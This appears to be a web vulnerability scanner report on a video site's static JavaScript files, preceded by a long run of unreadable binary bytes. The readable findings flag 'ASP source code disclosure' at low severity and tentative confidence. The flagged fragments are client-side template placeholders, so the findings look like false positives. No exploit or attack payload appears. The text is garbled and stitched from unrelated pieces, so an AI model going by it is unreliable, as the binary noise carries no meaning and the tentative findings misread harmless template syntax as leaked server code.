GT.vH".J..].. ....D\y57F.g.X0.`.    .    ..=.5....}.P.O.....;7...S.-.s|.D._A.....[C.....n........,...-...=`.....c...g.....r..%l.v#.$.h....HzI....{..p4...J......U.*u.......#..0..^.    .m.....).R.?.w..g}.ds..Pu..?9.&\o.S.L.faZ...A.[cG..c.Gg..{a4..(.....G.M..-.~.....va....tB..<...k.........9....o.{.%L.........8.....L..6Yq.b.
...f....j.w.K    p....szv:...Zg.....lu....Yk#~f.%H.bC.~.%..L.8.A...4.."U.&a8f....D./.Z..h^..F%C!W%.LA.7k.UR%I..0...o..f...K.....|.U.2.RaPi+..i9...e..c.Y.Asf/....#...=...,.../..#......G...c>.;.....Y.Q}R%4Sm..xN..mx........F..4..he...I...9....6.ng#sgB.3.J...*.m..~.'....@....h(...u.%+...~.dd.....5.....g.....h.H...E...:..y...).9.*{...W.....d..{9MR..-.>....,".....{g6x...H......(5C+..UT.....B..m.j~.......,..L_.;ZG....x....B....Y".Pd.....=.wg....Z{...
>.....U.B...CI.....!.....*.Xo]~..a.{....B.....6    -.gY8..*..    NZ8...u{.V...?..T"..z).X...a..3.....dA'.M./.>..K...MO._.;....,2......8...6.s..\w.....K....[h..OE.F.+aH.j..CAn.K..>>..~...5...j..EY.1..v.."..P....:a..........e....L..F..F.Z.C7... .WF....:......T.].A..]..Q.?..4.    ...Nc.|V.v..vK..i..[.:.......J.o.=.qH.+nl{..F"....<\........)...7...(g...t..l.;....$...0.C..IP.S.n...........1.@..0    
.$u2M.Cu....{..H;./^.%.v1    .T......z..<..<..a    .,;,.XFpk.......\j..[.B..`4K...`.A.....E..{..m....w.......`..P.-....lu...tWs#.lyF<....)a..)..........2.o.{x-z..}.}.P.$.Y..4..........$T8..}j.}.~.@.....    ..........$..[...p.;"lwR9B.a.rN................._..[....k......R7..X)..
G.n....}..o.{.......oY.....`
.D.0........+i@-.Z.....n.!..T...d.._f.1.8E. ......H.ii..F...P...?.p.N..x.^.....y?...&1.%....F..^a..V....^.-..t..g2..c.~..?K.3........j.IFR..}L.0...F.........|..X..).u/7.|`....g.......Q.]>....0.Y..LJ..k4..V......[.......<AD.\..    r.z.1C...........R(.O...V...F.q....1r=5...17('...7B..    .J.G....Eq..z..#.=.I&.b.......k&{......!...J........}...l..W...E.....m.@<f..(...,.N.C.*o.D...{R.B2.a.C..\..8gT....S..g....N..$..    ....O.)7....s..5^....j...;.$....a.$................. |.sA .......{....y\Q.IW.n)Q...................]1yx.
.K.Z0...6.X......y.o'......^.:....K.....B.R2M,Q._B.F<..l............hw...1&..E.f&?l.......FNTb....$..NX.."........&..#X.l~G%.........O.x...).D.g.#v.....)J....V.Ww....G...g...\{.'N\V3.....iC*+./`..0..u..,.-....tO4..]....0o...IE.S..Y..@.>
.;..X.Z.!.....D.:h.Y.s7.7v#...z..wt....s#.[...!.......KT..K.....z}..&v..8...a*...l.C-..].....,...VJ...`..{........|...G...?.6B./...w..fk.I..f...u#.../..;]OA.8.b.q.>..|@.^.=....Gg......Ut.U....-})@;.a..U..Z....`M.]..E....[IqW... @r78.u...........p3j3....i..d..T.d...N..H.>..[..ZHOQ.K.c..
.+M.....p.H...lb9evzo.g.OV...,.e..%...t.1....X.}......J.........T..V.S...!F..!.Pf."..K..B.w...^.{........].F.c.IR..:.n...s....7./....*...HsC...^sQ....G...l.    ....Hc....k!..?...VH...$iK.....S ..M.............    \.8e..@.Z)1d....-..'..t....?.K...m.qo.!....[."..@Wp:!....)5"..|......B&....S?..:.........rt).g(V8a..]....1...W?..cX6F.~.@{...........\.C... .......!.........<.......<.... ..Q........w.]. 6j8.JF:.PKA"....]=...V....*cM...w..w.9...F        .B.LDh...%.3..j6&.W...].    ...b.Y...x....t.I...V.W....T.........s!{..V.;.G+....f..j..Q    .    9v.].v-.B:...o..L...X..a...^......M........B.T;...L9...^....Z..".5.............R..F..x[.x.uF..!..;...b.jf.k.2..:.,...w8..@E1o..:..#..
.....HG C..0.:..E7.Z..    ...Lb.T...h...[.c...B.w..m,}.L.....h.$.....Pi`7Q...R}[X-.J..G\k..6.A.B.
..w..5..i..MKB
o.3.q./...v...0......f/..Vj%.._.cc..!.~..g..*...M.,........8..m.......r..k..g5.2..H...e....1...k.R...E    .aG..h.P5..x~x6......F/g`.SVl.....F...........YB..fc..^..>..!0....&nm..[...m.....'.......~...p..Q.p.m}..w(.]......W..i}>qD....A..C..-$.    .y...GB...X.... ....G.).........f.....+...x...!..........-.....\...%..8&.`.Q=...6m..=0#3&.{....Bk.{....n..`......
...@.8(t.?H..P..$.....t..(..7.V.LXFj.W;...>x..}.\.a.......w.K|...[...D.D..G..G....:C..s..V]P3E3#'.._.......Q.Sn........q.|Jr.Tl..!.........q6.JNn...Xk..........?...X<...w..?..0>.....B..........>.....b.BA....x.QQ`l...t/.1..4.;....C.{G......1..Fuc...'.....8x.....i.&......'.@.].|=.AD...b(A.el6a|...4.2J.NuB......'.u?......d^...,.]?>
..3...'.?.S..}.C.h5......X..h.v...e...d...^.....*%n6.@=S.:*%......p*)...Q......G.C..|1.b!.. ....&joW.].k....EN....e.._.....$    1...?p#E...
....Th=.dZ...."....d..'Q...Q....fP...i.20.)...\.....W..%.[ze:..
...[SNIP]...
<.0*...P.J....O.<?.ha.ok6...y.s.m07i..'..g..|o=2........pA.......P......|.....F1..*=].`...A...D.>......RFO...Z...s.m(.cI]h..v.s...eo\.8B..&9.'..I    z!h..l.......(Qrm.J..fG.f3    .....h.+...:..    .=.$r....x...m.8{e.d....;..OaI...W..R'.mm.s.um":....v!.:...@v.p\.L!..1@.C..Y.......x...F.0...............T....q.9...dt>4...V......#.mr..-........)8./...    .,..Z..".p$.G.N.Y.....#+.y......v...m..$...mA}!.@.    .u_..N..&.RE...i.....Fj..@...[.......q...U..#    
qA...9iG..EbN...6..n....w.F........l9FE.,~|.7..#,@#.8e.;....... m..._t"......7,,...}.....~R.l.n..E!........"...X...o
DE....H....nN...<.>..!..X.#.....=q..L...~..Kf..w..%.2.r.5.F..A.."~B.2..'=Q.,.....0....    .K..6_.6..R.4c........k    .....C....$..Y....s]x..".l0....6......w...I..In...Bu@.?.&...f....T.5......&.....<.M..5~...6.u.7....u..4..&6..:.[c.;.....HT;(v./K#.b...0...d.Uz.nx.N."..G.X.:.JR^6^`=.{I(...7.#..XKFf.E.~@.KDE..,.I%GH.....f.......@{<.W.M.2...o....;$..i.L.-6..+...w.6.N....~...$0.]..+.\.*<.=..{n..m...a*..>...&Z...N..z.w..q..kd.[..PZ[....1.6.....=..X...._.............?...    .Y.."-.E..Y.......uJC*....\..6b0.e\.....4<+G......^..K....E.V...v..;...,...i.,....6C.wm..Y..Fo.........Ek.]_..1..........=..b....:]g.....\^.9..!.    .....8..4.. U.....(.NiA.0t.e....o.....LX.a.G....9..    .9....U.......<r.......U..]..|/....X..:Gs0..\R.D'+..d..._Pw.@7....=sN..8J..8.......<.......[.7...i.E..S?......rJ+.W..........u}#....^.!.R..d.1.VS..    ...kU...@.-..v...s..a......_....v^.Cz.&.*w...+..92.wi.C.v.j.d..........8.....R..@]78....s*d\..F.0X..B.......%.H...C.2.........Ii.q>..*C....(...l.?=....Y. F9.&.IF...\...RI.r..=...p...:K>..sP&........s..H..Q.......~~.7.    ..N..A.Kh..H...8.8E.+^......gf..!...T.P.".I..s+bi..WGCY....V....!..e..1..R.DH.).{Z..Q...D..........Z.'....U+.."..>RpY...M.lD.......F...%kk.e.........`x.....xD..O.;0.+...$......+EL..E...Nw..j.7.y    ...BW2...D.z...lM...#>.g.qD..s.g....N#_    _.7O7..9.0z%Xc..p.....p...k....r"...Z....p......Sq.Q...q....-.....v.?. Q.O.[.......u.9......_$..F..N.@:K..m7..........~..j.w842.hDgx-.........p..`G....E..,..c..."I.r;4.k......8K?....]:.G......    k..>.z..H...79<..........A..a..`..XJ.|.P...=N3".?...?..C."..U..W..s3.5    ..y...2....
M..|>.:x....%$..4Q..0..1..E.q...>CH.Z...~<....9..%...Ip.'....d..}.    r.U,..3..........c.D.5.Wz].v.j..........2V.....f.iI..$...Vv9N6...>0....v..t.rJ....#.z......?.bt`[..te.z\2..W.....,;j.~..K...`.A|.....k......T*W....+..-......o0...SZ.....VKZ..r..(......*.....{....I-    R4f:...cu.`N..=.......o.so...8g.L.........iN..:...U.....U_.q..r)...S.kr..C..RW..1R....2.H*D2.\.3..XD.W.6x.OSf.,B_.n..F..k.c..p=,oV.....i....f.t).;..>CD.BF.~T.;.......AJ....Yx#$...fI.@..c`.T.....    .n....y.... ...(.5..~..j|..oI+.UY.PN....v... m..[.S..)..td{.... ..^"...
.k.q...c.q..M...7........-.v.2...&%.9...G.^..Y....@..$XL...z."....Fwd....!...{.|ou..Y...[/....z..H....G..W...S..wb......,..'.....R6...|.R.7..A......W...g....M.A...zl.wfn...Y}.V....6..c...;.X..]...)v...0F..#l*D......c..<..f...t...1.....p.b...sxYI.nA(...Qv..........].._.8e.....]..    .
.L.........5.p...0...3..*_...nr..%.Ig..c.@..q...t
.k....l:.....Vo.....?<..9.LH*..6$s^u"..y..4.E.....4....1..
.S)]....NA1.>.../......p...z...c.IX.....8... ..y.....].*..$..e#A2..uN.XZ..<
fdu[..b.'...<
..2
.Q...D,H..Q.1..0...3.....cLW....l.H'|0J.|(pK@./..`.<....z....;......|........?.(.....W..$X..p.....J.V>...<.f....q(u.;|Y................i^Ms.O.Q...e.UG...8.{... T....a.......O/-$.<O.....sq".2p...........(...=.@.5..4..F=......    ogj........xM.]U.:.q.....#..)..1G...`.{\oW.e....=g... ....."g......$x.Z..H.+.......Z...z6i....n$#...4R7..z...L..J...#....&...6JZ.`!.~...C!7.J..o...G.....:.Dlb...I.~.=....Ms6zH...j.c.h.[<.U.G..J.`d..P.....K..E...;.(..H..dS*....)8.43..@........4.[b^."..6..'..M{.......Y47..j.....%..7...@...Rx...>...}.........~.,g...........|..rx...#)....e).... Z..,f.....b."..N......:...r\..    ...o....eI.7..0&.W{.}yg.......    ..........$..Z....+..m..$.+..`...'ZDk@....I.j^..%...}....)zd..5....~..K.z......}5.........J..=5.zq..T..q.Fx.^.n...k.|...Kr...Hf.S..S..s
*g....+..y/..C&._..H..T{1.z.m*t...?..........m+.wG.X.Z=x.....k6..`R23.w..@Z'...!......j..C..Bx9.....]6../..H.^..    f.2^..(....W...Z......FB.;....t..(..?.H..u.........;....By...a9.....UV4..2)F...end........6.....
.<$.
.......n..7.SZ.r.<.../V..L1.xn.@.a.N1...R..s$.K$...*"....>.xBC.yF.o..-.Q.!}D.h`.a..u{.>t..7...-/*d@.....X.6vKkR\..Kb..
9.X.y....6...7.<..8.M....4...6...+#....x....F..k.[..4.z...~m?...q.....#..u.:Hf.x.P...2.\.H...l=={B,....I@.7>...B).>>z....[.a......%..oY@.+H.9....f..e.I..).b....v.+.K.le...W_../......OO
..........9s..N    ,...c..J[5...E.G.........Y....;..."..B...............?.>Q.....s....$f..x*.......+.t.$}....r.:X....z....i..r.2dTx.H~..|..u..]xu.{....).#^.Jo....ua.A>...e..........|......o71+...*.T,.....R....z..l..%..L...+,I.p..cb..h......y..^d..4!(.2..L#..{...Z...x.y|...G$......2..}..>HV....|...!...F...(....$..y:O...q..&.ox1...jf.>....+......~..........&.h...x.M..{.N5C61Q....
.../9.=d.u.......i..u8..L.w..a....x...].....v..K.5.....lDBSp.$.......t.(n.$..o.....<....t.H.7...*9.....u..fA..[ ..$..}d'.T.Z.\......#...I....C..?`..N.B......_\+..[.A......d.8.5o+.0.k..=...6p..i...:@....F\.=.6.
.......KX..M...J.:.    .Y;..`..2=IO....R..
L.=c........,hm...L..tW.[.....=zC+........Z4.Hfr.....;g..N:2..o.:_d.Z'.q.V...%Mn.A.....u..i...r.D[.&/Wuc...h..v......'3....00V..L......k....Oc.5...g.@.(.......y|}Xvh..Vy.C7.E\-?l5MC{AT...U.o$.........dI.g...0...yxKw.d.h..kV.j...PbXz.+T...81..w}$rb...v...F&..m...5....U~T..Q.?..J....}|.S...(&..i... ...k~?..e"9,{..t..    rO..$.... ..4Yvh..
....2}...0t.....J4..JZ.e.L]....2..U>....Q.....h.4rM..7..&a....6...C6.c$.)......r..8.o$<... X.^...n_
...".y}..g&...m...."......N...g...B...M..ql...l...+.5.U..~.P.. ID-..oV......9//    8k.W..s....@.....w....7|..?&...qL6............r.*Tx>.$..Q)..*.<.~HI;iG.]..UV......`..U..VP..#.*....<W.{..y.3L..f..    .0.'.+.in....G@..;....@..Bf.9.{6..&..H.f.@.u...Z...)s..DdN...)Y.&;,....8O3D6..J..P.+......,.!...\....L....0....T..R..n].8F...D...U.?.......Q./1......n.@Yu7.>.....9.'....Y.h...*.[...L...5..@$.....r.....V|d.R...*.b.I.Vt....i.a......z..8.e..
U..|...Y<.m..7.b..._..?$..\m>..r...r_..{........[._.u.b..G.....;..<>~.../..N-...c:4\..k.........\../.r.-....D"....5.HI...X.k..D>0.I.t3f.=../_.....NDz....Q4..<$u.^.....|U.'(.............j...<.q.Q$.Gi..(....#.U/....6.+|].......}?+...V....S.t3...?..{&.Q@2S]...g.........L.ZU=1...".W...w..'...y}d..&..\.....=o..6......BW.%S;._..w.........:.-I<...Ej...x.F.Gj...i.;-cH&..#&..vu.^.{..*'...g......#..$S....R..6..Ek...]Y.]...BT...+;i.o........?..5..Z[N.=*.y}...Un.....A.J.8..    .........f-.f.NW;...iQ.U])tv.g..A....q.r...........}.d...m9...K.E&u...`..3....CU_=".\.....:c4..............[....}.Q6.bg.%"....Q.G3+..j2...2..cIl..+..V....{.c....M..|.Y..Aa<..a..P..I......$.o....bp..F...+.p0.n..,z}......j.H.jn../..h.1.....U...+.E(}>..K....=...G.....D......0....
.......)8%.....XR..0.%6._......_....2.=..f.P..!;..P...(..~.r>j7$.....@Z...R.......!...5.w....,.p..|..@eZ.G.......|.........$C....a..KL.I.h...n.......[..Td3p....C.Tg.w...I... .h...Aa$~..p............\..N....S.{.O8,...F}X......u...c.7mn.&......B3..f...[......    .*.*..[VE.:.Z.@O8.....f..5P.M.<?..*....z.T.]..n......y..?.Le.?B.b.`..B..5~..k........P.d.`.]O]..R_....0/).?./..4.........    .KXD.O0...,........s8....."6...7....................A.$F..=.Z..."...B.......m.&.*^@
.rx..q....'.8.    .w
.......?..e.........f]..    n..".q.v$8'.:c.].N...qh...A....X`F.oG.O .'......C.....(..6...gK...9..O4.}b....d....7.j.0i.T4...zWe....]..,....M...X....gm....!l.x.,A.%..v.....f.Q.U..l    s..r=..Z.P....4k.yM..jI....G.5....FZ........>.4..a.q:).a...^c4.m...M....<.....Xw....~~.v.....+...}D..A.v.....P.5.}...[.0...&..N.....k.^`..N.......L.,...y..r....\......c!Q.:.}.....v......u...U.1....Z......p.M........ S?6.8.......F.*>/.._....R. }..G...;..1..Z@.O._)... .. ....#..    +..b-....e9..q..Z.J`..i......$)_...8.>.5..>.0.B<...@(\.9Q..eHw.D. ....3..q.5.uLG.~R.>Z.......d%..Fe%.v...K?h..;.D..'...u@J._.p'u.......    ..%.......$..[...u.uz8..p...=7-......@=.zq.a1..h.,c.../...ZJ..I^#.........xAk.6.4.
.....(.OuR.!..1...H........!......7..N.U"...s..    ......f.C.. rB.w."......HM....*,...w.4"z..+ n    ......An..+D..&...F.s~AX.^..3....p..OR......%F.....q.    %..1......D.K..~...f...G...p..n..S.bnY............Q..._l4(.X....J.a..jG..=x..=.........ZM!6q}1>....7.y.q.Fs5...7...wh^!.&.@...{.2....&#S..+...L.V...pq........z8N.4.h.`....PqL65..A...K..YF.K.....3..o..#......A...Y.6...<'.S{."yu=.....;.....q..A.}L_....k..........=Vv).i..k.d......TS di.*.k?.....j.'_.5j. .....#E:J.Ui.......&.QIE<..Z.c...4"].....T.b...
...1.N....;....K.<.c...@..r.ur}.....R5..X.).V.%.%9..`>#.-oI.....l..e.......;.dD....!..XO....+H.b..n....n.....4D.]C{.:...F...B..{.Q5*.......L|.a.h.(.H.....~.d..L.fD..oA{......TfC.l_.8...W@by..fO..w.!.I...%.g..O..*B..iz.H...eezt.U.......$....u..\..".3....T.W0.}i....0.'p...S.x..REW.u..W...@y.Q....B.r...24....%;.".@.gd.....,..{. .~...t..|....[.....z("..:[..`c.p....aW......_...(.>....T...hh.d(H2y...0...P$..c+..3.VY.J...+....M.....k......`.Am.-..;..Z.Ehv"Ri=.o...`<#.....?E..8..7..h.8!.....]...\.\.de.wk#.xz].-.%...._..    m....Z.:..c...#P.+.M..]mf...Z...Wj.... .....
hy<1.\0..*..V...O...V.VL..j..$1D...$..m...~...Q/O%.c.#.<jv8.}.......1x.hR%...s..g.UF......r6.A..Ey...kv....e[.)y.s..6*.....:..#M.l.s,.d...x.P`(0S+..g.5......... ...I..an.3o.....HDwi*.........N..N.wH.....B mi.....`%9k[..,....~k....+.n.o'`c(.%.N..{I.......t..s....{.ns.y.    ....!y.4A.....b...~\....?\..t.f....V......aY.<b..U...\.    ..y..!".A.........7;cdf].G......AGOG.A..UCQNal....T.2...G.:.....l.y.*D..L`.]Y..#?S19.......{.;...p......A"u......b.4....`.^............/o+..LA.on..~.1$.+?^h#.V=e........|.UP1x....I?(*$K.?w.M.B    FD1.W.l..o.J,d.............b.....|B.d.mW.M.`.....C.o3.2k-...<.......{.E\...E..W....~..+Y..>.}.s....j......F...C.    .+.ON.2.. 17).g.p...T{.>....8....K....WB.C.DG.XL...;.X.....W..a..o..8`9..34...)...9..p...Ly.s.n...&..4...*.T.?>
.*..3..\.w.CD......{.W.......Uh5_r.%..    A.......C....e..IM@....].....j.K..--.F.W.....9..=....c3..c.=7...%...7..|4..i..x..i..Z..i$.
....0.VtI'......5..e....y..f.RN.J;......
.W^.)......?.IN.......)5......
...[SNIP]...

10.4. http://js.tudouui.com/js/fn/saleloader_71.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://js.tudouui.com
Path:   /js/fn/saleloader_71.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/fn/saleloader_71.js HTTP/1.1
Host: js.tudouui.com
Proxy-Connection: keep-alive
Referer: http://www.tudou.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Last-Modified: Wed, 27 Jul 2011 11:02:56 GMT
ETag: "2232581825"
Content-Type: application/javascript
Expires: Sat, 24 Jul 2021 11:10:09 GMT
Cache-Control: max-age=314158472
X-Cache: HIT
Content-Length: 17261
Date: Mon, 15 Aug 2011 18:56:01 GMT
Server: lighttpd

/*
* @path STATIC/js/fn/saleloader.js
* @modified $Author: jyan $
* @version $Rev: 17237 $
* AD extension cpt control $Rev: 17237 $
* Created: dexter.yy
* Modified: $Author: jyan $ $LastCh
...[SNIP]...
<a target="_blank" href="<%=slink%>" <%=click%> >','<img src="<%=resource%>" />
...[SNIP]...
<a target="_blank" href="<%=slink%>" class="swfmask" <%=click%> >
...[SNIP]...
<embed width="<%=sourceWidth%>" height="<%=sourceHeight%>" type="application/x-shockwave-flash" ','src="<%=resource%>" ',y?'allowScriptAccess="always" ':"",'wmode="transparent" />
...[SNIP]...
<iframe src="<%=resource%>" frameborder="0" class="swfwrap" style="',s=="100%"?"":"width:"+s+"px;",u=="100%"?"":"height:"+u+"px;",'">
...[SNIP]...
<a id=<%=id%> class="tui_noflash" href="#" style="width:<%=width%>;height:<%=height%>;display:block;overflow:hidden;cursor:pointer;<%=style%>" onclick="<%=fn%>()">
...[SNIP]...
<a href="<%=ol%>" title="<%=to%>" target="new">
...[SNIP]...
<span><%=flashdesc%></span>
...[SNIP]...
<a href="<%=more%>" class="mo" target="_blank">
...[SNIP]...
<a title="<%=tt%>" href="<%=l%>
...[SNIP]...
<a href="<%=more%>" class="mo" target="_blank">
...[SNIP]...
<div class="pack <%=cardtype%> tid_<%=tid%>">
...[SNIP]...
<a class="inner" href="<%=statlink%>" title="<%=otitle%>" target="new" <%=throwId%>>','<img alt="....: <%=otitle%>" src="<%=pic%>" />
...[SNIP]...
<a href="<%=statlink%>" title="<%=otitle%>" target="new" <%=throwId%>><%=title%></a>
...[SNIP]...
</span><%=duration%></li>
...[SNIP]...
<a target="_blank" href="<%=userlink%>" <%=throwId%>><%=ownerName%></a></li>',"<%=playnum%>","</ul>
...[SNIP]...
<div class="ad_banner"><%=src%></div>
...[SNIP]...
<a href="<%=statlink%>" title="<%=otitle%>" target="_blank" throwId="<%=throwId%>"><%=title%></a></h6>','<p class="info"><%=desc%></p>
...[SNIP]...
<a target="_blank" href="<%=slink%>" title="<%=fulltext%>" throwId="<%=throwId%>"><%=text%></a>
...[SNIP]...

10.5. http://js.tudouui.com/js/fn/tuidefer_32.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://js.tudouui.com
Path:   /js/fn/tuidefer_32.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/fn/tuidefer_32.js HTTP/1.1
Host: js.tudouui.com
Proxy-Connection: keep-alive
Referer: http://www.tudou.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Last-Modified: Wed, 27 Jul 2011 06:50:26 GMT
ETag: "2744617600"
Content-Type: application/x-javascript
Expires: Sun, 25 Jul 2021 09:14:51 GMT
Cache-Control: max-age=314237954
X-Cache: HIT
Content-Length: 12823
Date: Mon, 15 Aug 2011 18:56:01 GMT
Server: lighttpd

/*
* @path js/fn/tuidefer.js
* @modified $Author: fzhang $
* @version $Rev: 17205 $
* @path STATIC/js/fn/tuidefer.js
* @charset gb18030
*/
TUI.stick=function(n,h,e){var j=(n.constructor==
...[SNIP]...
<div class="<%=wrap%>"><div class="<%=holder%>"><div class="<%=mask%>"></div><div class="<%=resize%>"></div><div class="<%=wTop%>"></div><div class="<%=wBottom%>"></div><div class="<%=wLeft%>"></div><div class="<%=wRight%>"></div><div class="<%=wNW%>"></div><div class="<%=wNE%>"></div><div class="<%=wSW%>"></div><div class="<%=wSE%>"></div><div class="<%=header%>"><span class="<%=close%>" title="....">
...[SNIP]...
<div class="<%=title%>"><%=_title%></div><div class="<%=bar%>"><%=_header%></div></div><div class="<%=content%>">
...[SNIP]...
<div class="<%=footer%>"><%=_footer%></div>
...[SNIP]...
<div class="<%=info%>"><%=_info%></div>
...[SNIP]...

10.6. http://js.tudouui.com/js/lib/tuilib_83.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://js.tudouui.com
Path:   /js/lib/tuilib_83.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/lib/tuilib_83.js HTTP/1.1
Host: js.tudouui.com
Proxy-Connection: keep-alive
Referer: http://www.tudou.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Last-Modified: Fri, 12 Aug 2011 06:35:40 GMT
ETag: "1713608361"
Content-Type: application/x-javascript
Expires: Mon, 09 Aug 2021 06:36:06 GMT
Cache-Control: max-age=315359999
X-Cache: HIT
Content-Length: 111588
Date: Mon, 15 Aug 2011 18:55:48 GMT
Server: lighttpd

/*
* @path js/lib/tuilib.js
* @modified $Author: fzhang $
* @version $Rev: 17767 $
* @path STATIC/js/lib/tuilib.js
* TUI JavaScript Library
* @charset gb18030
*/
(function(){var W=this,
...[SNIP]...
<a href="<%=url%>" target="<%=target%>">
...[SNIP]...
){return""}var q=r.substr(0,p).replace(/([^\x00-\xff])/g,"$1 ").substr(0,p).replace(/([^\x00-\xff])\s/g,"$1");return o?o.call(q,q):(r.length>q.length?q+"...":q)},format:function(o,p){return o.replace(/<%\=(\w+)%>/g,function(r,q){return p[q]!=null?p[q]:""})},convertTpl:function(q,p){var o=k[q]=k[q]||new Function("obj","var p=[],print=function(){p.push.apply(p,arguments);};obj.escapeHTML=TUI.escapeHTML;obj.substr=TUI.substr;with(obj){p.push('"+q.replace(/[\r\t\n]/g," ").split("<%").join("\t").replace(/((^|%>)[^\t]*)'/g,"$1\r").replace(/\t=(.*?)%>
...[SNIP]...
<object id="<%=id%>" <%=classid%> width="<%=width%>" height="<%=height%>" name="<%=name%>" <%=data%> style="<%=style%>" <%=mimetype%> >',embed:'<embed id="<%=id%>" width="<%=width%>" height="<%=height%>" flashvars="<%=flashvars%>" quality="high" name="<%=name%>" src="<%=src%>" style="<%=style%>" <%=mimetype%> ',pluginspage:'<a id=<%=id%> class="tui_noflash" href="#" style="width:<%=width%>;height:<%=height%>;display:block;overflow:hidden;cursor:pointer;<%=style%>" onclick="<%=fn%>()">
...[SNIP]...
<li ord="<%=order%>" keyv="<%=key%>"><span><%=key%></span><em><%=count%></em>
...[SNIP]...
<li class="first <%=prefix%>"><b></b><a href="<%=main_domain%>/home/<%=usr%>" target="_blank"><%=nic%></a>
...[SNIP]...
<a href="<%=login_domain%>/loginOut.do?r=<%=random%>">
...[SNIP]...
<a id=<%=id%> class="tui_noflashPlayer" href="#" style="width:<%=width%>;height:<%=height%>;display:block;overflow:hidden;cursor:pointer;<%=style%>" onclick="<%=fn%>(this)">
...[SNIP]...
<video id="<%=id%>_ts" name="<%=name%>_ts" controls="controls" height="<%=height%>" width="<%=width%>">
...[SNIP]...
<ul id="globalNotifier"><%=content%></ul>
...[SNIP]...
<a href="<%=url%>" target="'+c.target+'"><%=text%></a>
...[SNIP]...
l(f)}}},"jsonp")}});TUI.ns("TUI.Model.common",{getProgramUrl:function(a){return main_domain+"/programs/view/"+a+"/"},getPlaylistUrl:function(d,g){if(!d){return""}var a=main_domain+(d!=-1?"/playlist/p/l<%=lid%><%=iid%>.html<%=params%>":"/playlist/play/quicklist.html<%=params%>"),f,c={lid:d},b=typeof g;if(b=="number"||b=="string"){g={iid:g};b="object"}if(TUI.isPlainObject(g)){if(g.iid&&d!=-1){c.iid="i"+g.iid;delete g.iid}}else{g={}}var e=window.pageParams;if(e){if(e.tid){g.t
...[SNIP]...
reen&&e.widescreen.charAt(1)=="f"){g.widescreen=e.widescreen}}f=$.param(g);if(f){c.params="?"+f}return TUI.renderTpl(a,c)},getPlayalbumUrl:function(d,i){if(!d){return""}var a=main_domain+"/playlist/p/a<%=aid%><%=iid%>.html<%=params%>",c={aid:d},e,g,b=typeof i;if(b=="number"||b=="string"){i={iid:i};b="object"}if(b=="object"&&i!=null){if(i.iid){c.iid="i"+i.iid;delete i.iid}}else{i={}}var f=window.pageParams;if(f){if(f.tid){i.tid=f.t
...[SNIP]...

10.7. http://js.tudouui.com/js/page/index/v2/userInfo_11.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://js.tudouui.com
Path:   /js/page/index/v2/userInfo_11.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/page/index/v2/userInfo_11.js HTTP/1.1
Host: js.tudouui.com
Proxy-Connection: keep-alive
Referer: http://www.tudou.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Last-Modified: Wed, 10 Aug 2011 10:14:37 GMT
ETag: "396278141"
Content-Type: application/x-javascript
Expires: Sat, 07 Aug 2021 10:22:05 GMT
Cache-Control: max-age=315359913
X-Cache: HIT
Content-Length: 34100
Date: Mon, 15 Aug 2011 18:56:04 GMT
Server: lighttpd

TUI.ns("TUI.accessor",function(f){f=f||{};var e=f.data||{},d=f.event||new TUI.eventClass(),c,g=f.set||function(i,h){return e[i]=h},b=f.get||function(h){return e[h]};function a(){e={};if(f.data){f.data
...[SNIP]...
fresh:f};return j});TUI.ns("TUI.Model.common",{getProgramUrl:function(a){return main_domain+"/programs/view/"+a+"/"},getPlaylistUrl:function(d,g){if(!d){return""}var a=main_domain+(d!=-1?"/playlist/p/l<%=lid%><%=iid%>.html<%=params%>":"/playlist/play/quicklist.html<%=params%>"),f,c={lid:d},b=typeof g;if(b=="number"||b=="string"){g={iid:g};b="object"}if(TUI.isPlainObject(g)){if(g.iid&&d!=-1){c.iid="i"+g.iid;delete g.iid}}else{g={}}var e=window.pageParams;if(e){if(e.tid){g.t
...[SNIP]...
reen&&e.widescreen.charAt(1)=="f"){g.widescreen=e.widescreen}}f=$.param(g);if(f){c.params="?"+f}return TUI.renderTpl(a,c)},getPlayalbumUrl:function(d,h){if(!d){return""}var a=main_domain+"/playlist/p/a<%=aid%><%=iid%>.html<%=params%>",c={aid:d},e,g,b=typeof h;if(b=="number"||b=="string"){h={iid:h};b="object"}if(b=="object"&&h!=null){if(h.iid){c.iid="i"+h.iid;delete h.iid}}else{h={}}var f=window.pageParams;if(f){if(f.tid){h.tid=f.t
...[SNIP]...
